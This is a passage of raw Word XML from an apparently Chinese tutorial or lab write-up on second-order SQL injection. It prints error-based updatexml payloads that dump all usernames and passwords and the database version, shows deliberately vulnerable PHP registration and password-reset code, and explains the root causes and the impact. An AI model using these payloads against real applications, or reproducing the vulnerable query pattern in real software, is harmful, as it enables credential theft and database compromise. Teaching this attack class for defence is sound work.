              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>进制编码，避免使用单引号被转义；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>column_name</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：字段名，获取</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>表的所有字段；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>updatexml()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>触发报错回显。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-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>爆账号密码（注册用户名，适配</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">A' or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>格式）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A' or updatexml(1,concat(0x7e,(select group_concat(concat(username,0x3a,password)) from </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>users),0x7e),0)#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-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>注释：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">A' or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>确保语句必执行；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0x3a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>进制编码，用于分隔用户名和密码；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>group_concat()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：拼接所有用户的账号密码；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>updatexml()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>触发报错回显结果。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="221095FA" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="heading_7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>三、原理剖析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="38222FE6" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="heading_8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>二次注入的本质</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="102968D7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二次注入是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存储型注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>逻辑漏洞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的结合，核心是「分两步触发恶意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执行」，区别于普通一次注入（单次请求直接触发）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3773E5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第一步（入库阶段）：用户输入恶意字符（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>admin'#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），程序使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>addslashes()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>等转义函数，将单引号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>转义为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，避免当下注入，但转义后的字符（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>admin\'#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）会被完整存入数据库，原始恶意逻辑（闭合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>注释）未被破坏。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B18A9A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第二步（执行阶段）：程序从数据库中取出该恶意数据（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>admin'#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），未做任何二次过滤、校验，直接将其拼接到新的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查询语句中，此时转义符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>失效，恶意字符被正常解析，导致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语句被篡改，实现注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223F5962" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="heading_9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>底层漏洞代码逻辑（含注释）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10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7220A3" w14:paraId="2B78EEF9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A8CE0D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lastRenderedPageBreak/>
              <w:t>php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 xml:space="preserve">// 1. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>注册阶段（入库）：转义后存入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>数据库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$username = addslashes($_POST['username']); // </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>接收用户名，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>addslashes()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>转义单引号</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>\'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$password = md5($_POST['password']); // </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>密码加密，无注入影响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$email = addslashes($_POST['email']); // </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>邮箱转义，无注入影响</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>$sql = "INSERT INTO users(username,password,email) VALUES('$username','$pa</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ssword','$email')";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// </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>此时输入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A' or updatexml(1,concat(0x7e,(version())),0)#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，会被转义为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A\' or updatexml(1,concat(0x7e,(version())),0)#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>存入数据库，但数据库存储的是原始字符，转义符仅用于避免入库时注入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// 2. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>找回密码阶段（二次调用）：未校验直接拼接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$username = $_POST['username']; // </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>从数据库取出之前注册的用户名（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A' or updatexml(1,c</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>oncat(0x7e,(version())),0)#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>），未做任何转义、过滤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$sql = "SELECT * FROM users WHERE username='$username'"; // </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>直接拼接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，恶意字符被解析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// </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>最终执行的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SELECT * FROM users WHERE username='A' or updatexml(1,concat(0x7e,(version())),0)#...'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>注释后续内容，触发报错回显版本号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68CAED3E" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="heading_10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>四、成因分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="5C4156F0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二次注入的漏洞成因核心是「逻辑校</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>验缺失」，具体分为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691E28DA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1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>转义仅作用于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入库阶段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，未作用于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二次调用阶段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：程序仅在用户输入首次入库时做了转义防护，却忽略了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从数据库取出数据后，再次用于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拼接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的场景，未对取出的数据做二次过滤、校验。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AA08B6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2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>依赖不安全的转义函数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>addslashes()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>仅能转义单引号、双引号等特殊字符，无法从根源阻断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注入，且转义效果会因后续数据调用逻辑失效（如二次调用未转义）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D5E59B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3.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>动态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拼接逻辑：程序采用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字符串拼接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的方式构造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语句，而非参数化查询，只要恶意字符能逃逸转义，就能篡改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>语句的执行逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292E4125" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="heading_11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>五、危害分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="596E4D61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二次注入的危害与存储型注入一致，且因触发逻辑隐蔽（分两步），更难被发现，危害程度更高：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B498686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1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>窃取敏感数据：可通过注入获取数据库中的用户账号、密码（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>密码）、个人信息、业务数据等核心敏感信息，造成数据泄露。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2608A9DA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lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>越权操作：获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>等管理员账号后，可登录后台，执行修改、删除数据、添加恶意账号等越权操作，破坏业务正常运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A1C3B6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3.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>服务器控制：若数据库用户权限过高（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
